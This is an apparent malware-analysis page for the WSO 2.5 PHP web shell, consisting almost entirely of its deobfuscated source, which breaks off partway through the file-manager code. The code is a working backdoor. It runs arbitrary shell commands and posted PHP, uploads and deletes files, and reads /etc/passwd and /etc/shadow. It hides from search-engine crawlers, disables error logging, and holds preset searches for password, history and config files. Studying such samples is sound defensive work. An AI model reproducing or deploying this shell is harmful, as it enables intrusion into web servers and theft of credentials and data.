PHP Malware Analysis

wso.php, wso.php5

md5: 85ce69862572d836cffe0e38f4365c2d

Jump to:

Screenshot


Attributes

Encoding

Environment

Execution

Files

Input

Title
  • " . $_SERVER['HTTP_HOST'] . " - WSO " . WSO_VERSION . " (Deobfuscated)
  • " . $_SERVER['HTTP_HOST'] . " - WSO " . WSO_VERSION ." (Original)
  • localhost - WSO 2.5 (HTML)

URLs


Deobfuscated PHP code

<?php

$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
if ($argc == 3) {
    $_POST = unserialize(base64_decode($argv[1]));
    $_SERVER = unserialize(base64_decode($argv[2]));
}
if (!empty($_SERVER['HTTP_USER_AGENT'])) {
    $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
    if (preg_match("/Google|Slurp|MSNBot|ia_archiver|Yandex|Rambler/i", $_SERVER['HTTP_USER_AGENT'])) {
        header('HTTP/1.0 404 Not Found');
        exit;
    }
}
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@set_time_limit(0);
if (function_exists('set_magic_quotes_runtime')) {
    set_magic_quotes_runtime(0);
}
@define('WSO_VERSION', '2.5');
if (get_magic_quotes_gpc()) {
    function WSOstripslashes($array)
    {
        return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
    }
    $_POST = WSOstripslashes($_POST);
    $_COOKIE = WSOstripslashes($_COOKIE);
}
function wsoLogin()
{
    die("<pre align=center><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></pre>");
}
function WSOsetcookie($k, $v)
{
    $_COOKIE[$k] = $v;
    setcookie($k, $v);
}
if (!empty($auth_pass)) {
    if (isset($_POST['pass']) && md5($_POST['pass']) == $auth_pass) {
        WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);
    }
    if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || $_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass) {
        wsoLogin();
    }
}
if (strtolower("PHP") == "win") {
    $os = 'win';
} else {
    $os = 'nix';
}
$safe_mode = @ini_get('safe_mode');
if (!$safe_mode) {
    error_reporting(0);
}
$disable_functions = @ini_get('disable_functions');
$home_cwd = @getcwd();
if (isset($_POST['c'])) {
    @chdir($_POST['c']);
}
$cwd = @getcwd();
if ($os == 'win') {
    $home_cwd = str_replace("\\", "/", $home_cwd);
    $cwd = str_replace("\\", "/", $cwd);
}
if ($cwd[strlen($cwd) - 1] != '/') {
    $cwd .= '/';
}
if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'])) {
    $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool) $default_use_ajax;
}
if ($os == 'win') {
    $aliases = array("List Directory" => "dir", "Find index.php in current dir" => "dir /s /w /b index.php", "Find *config*.php in current dir" => "dir /s /w /b *config*.php", "Show active connections" => "netstat -an", "Show running services" => "net start", "User accounts" => "net user", "Show computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all");
} else {
    $aliases = array("List dir" => "ls -lha", "list file attributes on a Linux second extended file system" => "lsattr -va", "show opened ports" => "netstat -an | grep -i listen", "process status" => "ps aux", "Find" => "", "find all suid files" => "find / -type f -perm -04000 -ls", "find suid files in current dir" => "find . -type f -perm -04000 -ls", "find all sgid files" => "find / -type f -perm -02000 -ls", "find sgid files in current dir" => "find . -type f -perm -02000 -ls", "find config.inc.php files" => "find / -type f -name config.inc.php", "find config* files" => "find / -type f -name \"config*\"", "find config* files in current dir" => "find . -type f -name \"config*\"", "find all writable folders and files" => "find / -perm -2 -ls", "find all writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", "Locate" => "", "locate httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf", "locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" => "locate admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate config.php", "locate config.inc files" => "locate config.inc", "locate config.inc.php" => "locate config.inc.php", "locate config.default.php files" => "locate config.default.php", "locate config* files " => "locate config", "locate .conf files" => "locate '.conf'", "locate .pwd files" => "locate '.pwd'", "locate .sql files" => "locate '.sql'", "locate .htpasswd files" => "locate '.htpasswd'", "locate .bash_history files" => "locate '.bash_history'", "locate .mysql_history files" => "locate '.mysql_history'", "locate .fetchmailrc files" => "locate '.fetchmailrc'", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv");
}
function wsoHeader()
{
    if (empty($_POST['charset'])) {
        $_POST['charset'] = $GLOBALS['default_charset'];
    }
    global $color;
    echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST['charset'] . "'><title>" . $_SERVER['HTTP_HOST'] . " - WSO " . WSO_VERSION . "</title>\n<style>\nbody{background-color:#444;color:#e1e1e1;}\nbody,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }\ntable.info{ color:#fff;background-color:#222; }\nspan,h1,a{ color: {$color} !important; }\nspan{ font-weight: bolder; }\nh1{ border-left:5px solid {$color};padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }\ndiv.content{ padding: 5px;margin-left:5px;background-color:#333; }\na{ text-decoration:none; }\na:hover{ text-decoration:underline; }\n.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }\n.bigarea{ width:100%;height:300px; }\ninput,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid {$color}; font: 9pt Monospace,'Courier New'; }\nform{ margin:0px; }\n#toolsTbl{ text-align:center; }\n.toolsInp{ width: 300px }\n.main th{text-align:left;background-color:#5e5e5e;}\n.main tr:hover{background-color:#5e5e5e}\n.l1{background-color:#444}\n.l2{background-color:#333}\npre{font-family:Courier,Monospace;}\n</style>\n<script>\n    var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';\n    var a_ = '" . htmlspecialchars(@$_POST['a']) . "'\n    var charset_ = '" . htmlspecialchars(@$_POST['charset']) . "';\n    var p1_ = '" . (strpos(@$_POST['p1'], "\n") !== false ? '' : htmlspecialchars($_POST['p1'], ENT_QUOTES)) . "';\n    var p2_ = '" . (strpos(@$_POST['p2'], "\n") !== false ? '' : htmlspecialchars($_POST['p2'], ENT_QUOTES)) . "';\n    var p3_ = '" . (strpos(@$_POST['p3'], "\n") !== false ? '' : htmlspecialchars($_POST['p3'], ENT_QUOTES)) . "';\n    var d = document;\n\tfunction set(a,c,p1,p2,p3,charset) {\n\t\tif(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;\n\t\tif(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;\n\t\tif(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;\n\t\tif(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;\n\t\tif(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;\n\t\tif(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;\n\t}\n\tfunction g(a,c,p1,p2,p3,charset) {\n\t\tset(a,c,p1,p2,p3,charset);\n\t\td.mf.submit();\n\t}\n\tfunction a(a,c,p1,p2,p3,charset) {\n\t\tset(a,c,p1,p2,p3,charset);\n\t\tvar params = 'ajax=true';\n\t\tfor(i=0;i<d.mf.elements.length;i++)\n\t\t\tparams += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);\n\t\tsr('" . addslashes($_SERVER['REQUEST_URI']) . "', params);\n\t}\n\tfunction sr(url, params) {\n\t\tif (window.XMLHttpRequest)\n\t\t\treq = new XMLHttpRequest();\n\t\telse if (window.ActiveXObject)\n\t\t\treq = new ActiveXObject('Microsoft.XMLHTTP');\n        if (req) {\n            req.onreadystatechange = processReqChange;\n            req.open('POST', url, true);\n            req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');\n            req.send(params);\n        }\n\t}\n\tfunction processReqChange() {\n\t\tif( (req.readyState == 4) )\n\t\t\tif(req.status == 200) {\n\t\t\t\tvar reg = new RegExp(\"(\\\\d+)([\\\\S\\\\s]*)\", 'm');\n\t\t\t\tvar arr=reg.exec(req.responseText);\n\t\t\t\teval(arr[2].substr(0, arr[1]));\n\t\t\t} else alert('Request error!');\n\t}\n</script>\n<head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'>\n<form method=post name=mf style='display:none;'>\n<input type=hidden name=a>\n<input type=hidden name=c>\n<input type=hidden name=p1>\n<input type=hidden name=p2>\n<input type=hidden name=p3>\n<input type=hidden name=charset>\n</form>";
    $freeSpace = @diskfreespace($GLOBALS['cwd']);
    $totalSpace = @disk_total_space($GLOBALS['cwd']);
    $totalSpace = $totalSpace ? $totalSpace : 1;
    $release = @php_uname('r');
    $kernel = @php_uname('s');
    $explink = 'http://exploit-db.com/search/?action=search&filter_description=';
    if (strpos('Linux', $kernel) !== false) {
        $explink .= urlencode('Linux Kernel ' . substr($release, 0, 6));
    } else {
        $explink .= urlencode($kernel . ' ' . substr($release, 0, 3));
    }
    if (!function_exists('posix_getegid')) {
        $user = @get_current_user();
        $uid = @getmyuid();
        $gid = @getmygid();
        $group = "?";
    } else {
        $uid = @posix_getpwuid(posix_geteuid());
        $gid = @posix_getgrgid(posix_getegid());
        $user = $uid['name'];
        $uid = $uid['uid'];
        $group = $gid['name'];
        $gid = $gid['gid'];
    }
    $cwd_links = '';
    $path = explode("/", $GLOBALS['cwd']);
    $n = count($path);
    for ($i = 0; $i < $n - 1; $i++) {
        $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
        for ($j = 0; $j <= $i; $j++) {
            $cwd_links .= $path[$j] . '/';
        }
        $cwd_links .= "\")'>" . $path[$i] . "/</a>";
    }
    $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
    $opt_charsets = '';
    foreach ($charsets as $item) {
        $opt_charsets .= '<option value="' . $item . '" ' . ($_POST['charset'] == $item ? 'selected' : '') . '>' . $item . '</option>';
    }
    $m = array('Sec. Info' => 'SecInfo', 'Files' => 'FilesMan', 'Console' => 'Console', 'Sql' => 'Sql', 'Php' => 'Php', 'String tools' => 'StringTools', 'Bruteforce' => 'Bruteforce', 'Network' => 'Network');
    if (!empty($GLOBALS['auth_pass'])) {
        $m['Logout'] = 'Logout';
    }
    $m['Self remove'] = 'SelfRemove';
    $menu = '';
    foreach ($m as $k => $v) {
        $menu .= '<th width="' . (int) (100 / count($m)) . '%">[ <a href="#" onclick="g(\'' . $v . '\',null,\'\',\'\',\'\')">' . $k . '</a> ]</th>';
    }
    $drives = "";
    if ($GLOBALS['os'] == 'win') {
        foreach (range('c', 'z') as $drive) {
            if (is_dir($drive . ':\\')) {
                $drives .= '<a href="#" onclick="g(\'FilesMan\',\'' . $drive . ':/\')">[ ' . $drive . ' ]</a> ';
            }
        }
    }
    echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:' . ($GLOBALS['os'] == 'win' ? '<br>Drives:' : '') . '</span></td>' . '<td><nobr>' . substr(@php_uname(), 0, 120) . ' <a href="' . $explink . '" target=_blank>[exploit-db.com]</a></nobr><br>' . $uid . ' ( ' . $user . ' ) <span>Group:</span> ' . $gid . ' ( ' . $group . ' )<br>' . @phpversion() . ' <span>Safe mode:</span> ' . ($GLOBALS['safe_mode'] ? '<font color=red>ON</font>' : '<font color=green><b>OFF</b></font>') . ' <a href=# onclick="g(\'Php\',null,\'\',\'info\')">[ phpinfo ]</a> <span>Datetime:</span> ' . date('Y-m-d H:i:s') . '<br>' . wsoViewSize($totalSpace) . ' <span>Free:</span> ' . wsoViewSize($freeSpace) . ' (' . (int) ($freeSpace / $totalSpace * 100) . '%)<br>' . $cwd_links . ' ' . wsoPermsColor($GLOBALS['cwd']) . ' <a href=# onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ home ]</a><br>' . $drives . '</td>' . '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">' . $opt_charsets . '</optgroup></select><br><span>Server IP:</span><br>' . @$_SERVER["SERVER_ADDR"] . '<br><span>Client IP:</span><br>' . $_SERVER['REMOTE_ADDR'] . '</nobr></td></tr></table>' . '<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>' . $menu . '</tr></table><div style="margin:5">';
}
function wsoFooter()
{
    $is_writable = is_writable($GLOBALS['cwd']) ? " <font color='green'>(Writeable)</font>" : " <font color=red>(Not writable)</font>";
    echo "\n</div>\n<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%  style='border-top:2px solid #333;border-bottom:2px solid #333;'>\n\t<tr>\n\t\t<td><form onsubmit='g(null,this.c.value,\"\");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS['cwd']) . "'><input type=submit value='>>'></form></td>\n\t\t<td><form onsubmit=\"g('FilesTools',null,this.f.value);return false;\"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>\n\t</tr><tr>\n\t\t<td><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);return false;\"><span>Make dir:</span>{$is_writable}<br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td>\n\t\t<td><form onsubmit=\"g('FilesTools',null,this.f.value,'mkfile');return false;\"><span>Make file:</span>{$is_writable}<br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>\n\t</tr><tr>\n\t\t<td><form onsubmit=\"g('Console',null,this.c.value);return false;\"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td>\n\t\t<td><form method='post' ENCTYPE='multipart/form-data'>\n\t\t<input type=hidden name=a value='FilesMAn'>\n\t\t<input type=hidden name=c value='" . $GLOBALS['cwd'] . "'>\n\t\t<input type=hidden name=p1 value='uploadFile'>\n\t\t<input type=hidden name=charset value='" . (isset($_POST['charset']) ? $_POST['charset'] : '') . "'>\n\t\t<span>Upload file:</span>{$is_writable}<br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br  ></td>\n\t</tr></table></div></body></html>";
}
if (!function_exists("posix_getpwuid") && strpos($GLOBALS['disable_functions'], 'posix_getpwuid') === false) {
    function posix_getpwuid($p)
    {
        return false;
    }
}
if (!function_exists("posix_getgrgid") && strpos($GLOBALS['disable_functions'], 'posix_getgrgid') === false) {
    function posix_getgrgid($p)
    {
        return false;
    }
}
function wsoEx($in)
{
    $out = '';
    if (function_exists('exec')) {
        @exec($in, $out);
        $out = @join("\n", $out);
    } elseif (function_exists('passthru')) {
        ob_start();
        @passthru($in);
        $out = ob_get_clean();
    } elseif (function_exists('system')) {
        ob_start();
        @system($in);
        $out = ob_get_clean();
    } elseif (function_exists('shell_exec')) {
        $out = shell_exec($in);
    } elseif (is_resource($f = @popen($in, "r"))) {
        $out = "";
        while (!@feof($f)) {
            $out .= fread($f, 1024);
        }
        pclose($f);
    }
    return $out;
}
function wsoViewSize($s)
{
    if ($s >= 1073741824) {
        return sprintf('%1.2f', $s / 1073741824) . ' GB';
    } elseif ($s >= 1048576) {
        return sprintf('%1.2f', $s / 1048576) . ' MB';
    } elseif ($s >= 1024) {
        return sprintf('%1.2f', $s / 1024) . ' KB';
    } else {
        return $s . ' B';
    }
}
function wsoPerms($p)
{
    if (($p & 0xc000) == 0xc000) {
        $i = 's';
    } elseif (($p & 0xa000) == 0xa000) {
        $i = 'l';
    } elseif (($p & 0x8000) == 0x8000) {
        $i = '-';
    } elseif (($p & 0x6000) == 0x6000) {
        $i = 'b';
    } elseif (($p & 0x4000) == 0x4000) {
        $i = 'd';
    } elseif (($p & 0x2000) == 0x2000) {
        $i = 'c';
    } elseif (($p & 0x1000) == 0x1000) {
        $i = 'p';
    } else {
        $i = 'u';
    }
    $i .= $p & 0x100 ? 'r' : '-';
    $i .= $p & 0x80 ? 'w' : '-';
    $i .= $p & 0x40 ? $p & 0x800 ? 's' : 'x' : ($p & 0x800 ? 'S' : '-');
    $i .= $p & 0x20 ? 'r' : '-';
    $i .= $p & 0x10 ? 'w' : '-';
    $i .= $p & 0x8 ? $p & 0x400 ? 's' : 'x' : ($p & 0x400 ? 'S' : '-');
    $i .= $p & 0x4 ? 'r' : '-';
    $i .= $p & 0x2 ? 'w' : '-';
    $i .= $p & 0x1 ? $p & 0x200 ? 't' : 'x' : ($p & 0x200 ? 'T' : '-');
    return $i;
}
function wsoPermsColor($f)
{
    if (!@is_readable($f)) {
        return '<font color=#FF0000>' . wsoPerms(@fileperms($f)) . '</font>';
    } elseif (!@is_writable($f)) {
        return '<font color=white>' . wsoPerms(@fileperms($f)) . '</font>';
    } else {
        return '<font color=#25ff00>' . wsoPerms(@fileperms($f)) . '</font>';
    }
}
function wsoScandir($dir)
{
    if (function_exists("scandir")) {
        return scandir($dir);
    } else {
        $dh = opendir($dir);
        while (false !== ($filename = readdir($dh))) {
            $files[] = $filename;
        }
        return $files;
    }
}
function wsoWhich($p)
{
    $path = wsoEx('which ' . $p);
    if (!empty($path)) {
        return $path;
    }
    return false;
}
function actionSecInfo()
{
    wsoHeader();
    echo "<h1>Server security information</h1><div class=content>";
    function wsoSecParam($n, $v)
    {
        $v = trim($v);
        if ($v) {
            echo '<span>' . $n . ': </span>';
            if (strpos($v, "\n") === false) {
                echo $v . '<br>';
            } else {
                echo '<pre class=ml1>' . $v . '</pre>';
            }
        }
    }
    wsoSecParam('Server software', @getenv('SERVER_SOFTWARE'));
    if (function_exists('apache_get_modules')) {
        wsoSecParam('Loaded Apache modules', implode(', ', apache_get_modules()));
    }
    wsoSecParam('Disabled PHP Functions', $GLOBALS['disable_functions'] ? $GLOBALS['disable_functions'] : 'none');
    wsoSecParam('Open base dir', @ini_get('open_basedir'));
    wsoSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
    wsoSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
    wsoSecParam('cURL support', function_exists('curl_version') ? 'enabled' : 'no');
    $temp = array();
    if (function_exists('mysql_get_client_info')) {
        $temp[] = "MySql (" . mysql_get_client_info() . ")";
    }
    if (function_exists('mssql_connect')) {
        $temp[] = "MSSQL";
    }
    if (function_exists('pg_connect')) {
        $temp[] = "PostgreSQL";
    }
    if (function_exists('oci_connect')) {
        $temp[] = "Oracle";
    }
    wsoSecParam('Supported databases', implode(', ', $temp));
    echo "<br>";
    if ($GLOBALS['os'] == 'nix') {
        wsoSecParam('Readable /etc/passwd', @is_readable('/etc/passwd') ? "yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>" : 'no');
        wsoSecParam('Readable /etc/shadow', @is_readable('/etc/shadow') ? "yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"shadow\")'>[view]</a>" : 'no');
        wsoSecParam('OS version', @file_get_contents('/proc/version'));
        wsoSecParam('Distr name', @file_get_contents('/etc/issue.net'));
        if (!$GLOBALS['safe_mode']) {
            $userful = array('gcc', 'lcc', 'cc', 'ld', 'make', 'php', 'perl', 'python', 'ruby', 'tar', 'gzip', 'bzip', 'bzip2', 'nc', 'locate', 'suidperl');
            $danger = array('kav', 'nod32', 'bdcored', 'uvscan', 'sav', 'drwebd', 'clamd', 'rkhunter', 'chkrootkit', 'iptables', 'ipfw', 'tripwire', 'shieldcc', 'portsentry', 'snort', 'ossec', 'lidsadm', 'tcplodg', 'sxid', 'logcheck', 'logwatch', 'sysmask', 'zmbscap', 'sawmill', 'wormscan', 'ninja');
            $downloaders = array('wget', 'fetch', 'lynx', 'links', 'curl', 'get', 'lwp-mirror');
            echo "<br>";
            $temp = array();
            foreach ($userful as $item) {
                if (wsoWhich($item)) {
                    $temp[] = $item;
                }
            }
            wsoSecParam('Userful', implode(', ', $temp));
            $temp = array();
            foreach ($danger as $item) {
                if (wsoWhich($item)) {
                    $temp[] = $item;
                }
            }
            wsoSecParam('Danger', implode(', ', $temp));
            $temp = array();
            foreach ($downloaders as $item) {
                if (wsoWhich($item)) {
                    $temp[] = $item;
                }
            }
            wsoSecParam('Downloaders', implode(', ', $temp));
            echo "<br/>";
            wsoSecParam('HDD space', wsoEx('df -h'));
            wsoSecParam('Hosts', @file_get_contents('/etc/hosts'));
            echo "<br/><span>posix_getpwuid (\"Read\" /etc/passwd)</span><table><form onsubmit='g(null,null,\"5\",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=\">>\"></form>";
            if (isset($_POST['p2'], $_POST['p3']) && is_numeric($_POST['p2']) && is_numeric($_POST['p3'])) {
                $temp = "";
                for (; $_POST['p2'] <= $_POST['p3']; $_POST['p2']++) {
                    $uid = @posix_getpwuid($_POST['p2']);
                    if ($uid) {
                        $temp .= join(':', $uid) . "\n";
                    }
                }
                echo "<br/>";
                wsoSecParam('Users', $temp);
            }
        }
    } else {
        wsoSecParam('OS Version', wsoEx('ver'));
        wsoSecParam('Account Settings', wsoEx('net accounts'));
        wsoSecParam('User Accounts', wsoEx('net user'));
    }
    echo "</div>";
    wsoFooter();
}
function actionPhp()
{
    if (isset($_POST['ajax'])) {
        WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', true);
        ob_start();
        eval($_POST['p1']);
        $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "\n\r\t\\'\x00") . "';\n";
        echo strlen($temp), "\n", $temp;
        exit;
    }
    if (empty($_POST['ajax']) && !empty($_POST['p1'])) {
        WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', 0);
    }
    wsoHeader();
    if (isset($_POST['p2']) && $_POST['p2'] == 'info') {
        echo "<h1>PHP info</h1><div class=content><style>.p {color:#000;}</style>";
        ob_start();
        phpinfo();
        $tmp = ob_get_clean();
        $tmp = preg_replace(array('!(body|a:\\w+|body, td, th, h1, h2) {.*}!msiU', '!td, th {(.*)}!msiU', '!<img[^>]+>!msiU'), array('', '.e, .v, .h, .h th {$1}', ''), $tmp);
        echo str_replace('<h1', '<h2', $tmp) . '</div><br>';
    }
    echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(\'Php\',null,this.code.value);}else{g(\'Php\',null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>' . (!empty($_POST['p1']) ? htmlspecialchars($_POST['p1']) : '') . '</textarea><input type=submit value=Eval style="margin-top:5px">';
    echo ' <input type=checkbox name=ajax value=1 ' . ($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] ? 'checked' : '') . '> send using AJAX</form><pre id=PhpOutput style="' . (empty($_POST['p1']) ? 'display:none;' : '') . 'margin-top:5px;" class=ml1>';
    if (!empty($_POST['p1'])) {
        ob_start();
        eval($_POST['p1']);
        echo htmlspecialchars(ob_get_clean());
    }
    echo "</pre></div>";
    wsoFooter();
}
function actionFilesMan()
{
    if (!empty($_COOKIE['f'])) {
        $_COOKIE['f'] = @unserialize($_COOKIE['f']);
    }
    if (!empty($_POST['p1'])) {
        switch ($_POST['p1']) {
            case 'uploadFile':
                if (!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name'])) {
                    echo "Can't upload file!";
                }
                break;
            case 'mkdir':
                if (!@mkdir($_POST['p2'])) {
                    echo "Can't create new dir";
                }
                break;
            case 'delete':
                function deleteDir($path)
                {
                    $path = substr($path, -1) == '/' ? $path : $path . '/';
                    $dh = opendir($path);
                    while (($item = readdir($dh)) !== false) {
                        $item = $path . $item;
                        if (basename($item) == ".." || basename($item) == ".") {
                            continue;
                        }
                        $type = filetype($item);
                        if ($type == "dir") {
                            deleteDir($item);
                        } else {
                            @unlink($item);
                        }
                    }
                    closedir($dh);
                    @rmdir($path);
                }
                if (is_array(@$_POST['f'])) {
                    foreach ($_POST['f'] as $f) {
                        if ($f == '..') {
                            continue;
                        }
                        $f = urldecode($f);
                        if (is_dir($f)) {
                            deleteDir($f);
                        } else {
                            @unlink($f);
                        }
                    }
                }
                break;
            case 'paste':
                if ($_COOKIE['act'] == 'copy') {
                    function copy_paste($c, $s, $d)
                    {
                        if (is_dir($c . $s)) {
                            mkdir($d . $s);
                            $h = @opendir($c . $s);
                            while (($f = @readdir($h)) !== false) {
                                if ($f != "." and $f != "..") {
                                    copy_paste($c . $s . '/', $f, $d . $s . '/');
                                }
                            }
                        } elseif (is_file($c . $s)) {
                            @copy($c . $s, $d . $s);
                        }
                    }
                    foreach ($_COOKIE['f'] as $f) {
                        copy_paste($_COOKIE['c'], $f, $GLOBALS['cwd']);
                    }
                } elseif ($_COOKIE['act'] == 'move') {
                    function move_paste($c, $s, $d)
                    {
                        if (is_dir($c . $s)) {
                            mkdir($d . $s);
                            $h = @opendir($c . $s);
                            while (($f = @readdir($h)) !== false) {
                                if ($f != "." and $f != "..") {
                                    copy_paste($c . $s . '/', $f, $d . $s . '/');
                                }
                            }
                        } elseif (@is_file($c . $s)) {
                            @copy($c . $s, $d . $s);
                        }
                    }
                    foreach ($_COOKIE['f'] as $f) {
                        @rename($_COOKIE['c'] . $f, $GLOBALS['cwd'] . $f);
                    }
                } elseif ($_COOKIE['act'] == 'zip') {
                    if (class_exists('ZipArchive')) {
                        $zip = new ZipArchive();
                        if ($zip->open($_POST['p2'], 1)) {
                            chdir($_COOKIE['c']);
                            foreach ($_COOKIE['f'] as $f) {
                                if ($f == '..') {
                                    continue;
                                }
                                if (@is_file($_COOKIE['c'] . $f)) {
                                    $zip->addFile($_COOKIE['c'] . $f, $f);
                                } elseif (@is_dir($_COOKIE['c'] . $f)) {
                                    $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f . '/'));
                                    foreach ($iterator as $key => $value) {
                                        $zip->addFile(realpath($key), $key);
                                    }
                                }
                            }
                            chdir($GLOBALS['cwd']);
                            $zip->close();
                        }
                    }
                } elseif ($_COOKIE['act'] == 'unzip') {
                    if (class_exists('ZipArchive')) {
                        $zip = new ZipArchive();
                        foreach ($_COOKIE['f'] as $f) {
                            if ($zip->open($_COOKIE['c'] . $f)) {
                                $zip->extractTo($GLOBALS['cwd']);
                                $zip->close();
                            }
                        }
                    }
                } elseif ($_COOKIE['act'] == 'tar') {
                    chdir($_COOKIE['c']);
                    $_COOKIE['f'] = array_map('escapeshellarg', $_COOKIE['f']);
                    wsoEx('tar cfzv ' . escapeshellarg($_POST['p2']) . ' ' . implode(' ', $_COOKIE['f']));
                    chdir($GLOBALS['cwd']);
                }
                unset($_COOKIE['f']);
                setcookie('f', '', time() - 3600);
                break;
            default:
                if (!empty($_POST['p1'])) {
                    WSOsetcookie('act', $_POST['p1']);
                    WSOsetcookie('f', serialize(@$_POST['f']));
                    WSOsetcookie('c', @$_POST['c']);
                }
                break;
        }
    }
    wsoHeader();
    echo "<h1>File manager</h1><div class=content><script>p1_=p2_=p3_=\"\";</script>";
    $dirContent = wsoScandir(isset($_POST['c']) ? $_POST['c'] : $GLOBALS['cwd']);
    if ($dirContent === false) {
        echo "Can't open this folder!";
        wsoFooter();
        return;
    }
    global $sort;
    $sort = array('name', 1);
    if (!empty($_POST['p1'])) {
        if (preg_match('!s_([A-z]+)_(\\d{1})!', $_POST['p1'], $match)) {
            $sort = array($match[1], (int) $match[2]);
        }
    }
    echo "<script>\n\tfunction sa() {\n\t\tfor(i=0;i<d.files.elements.length;i++)\n\t\t\tif(d.files.elements[i].type == 'checkbox')\n\t\t\t\td.files.elements[i].checked = d.files.elements[0].checked;\n\t}\n</script>\n<table width='100%' class='main' cellspacing='0' cellpadding='2'>\n<form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_" . ($sort[1] ? 0 : 1) . "\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_" . ($sort[1] ? 0 : 1) . "\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_" . ($sort[1] ? 0 : 1) . "\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_" . ($sort[1] ? 0 : 1) . "\")'>Permissions</a></th><th>Actions</th></tr>";
    $dirs = $files = array();
    $n = count($dirContent);
    for ($i = 0; $i < $n; $i++) {
        $ow = @posix_getpwuid(@fileowner($dirContent[$i]));
        $gr = @posix_getgrgid(@filegroup($dirContent[$i]));
        $tmp = array('name' => $dirContent[$i], 'path' => $GLOBALS['cwd'] . $dirContent[$i], 'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])), 'perms' => wsoPermsColor($GLOBALS['cwd'] . $dirContent[$i]), 'size' => @filesize($GLOBALS['cwd'] . $dirContent[$i]), 'owner' => $ow['name'] ? $ow['name'] : @fileowner($dirContent[$i]), 'group' => $gr['name'] ? $gr['name'] : @filegroup($dirContent[$i]));
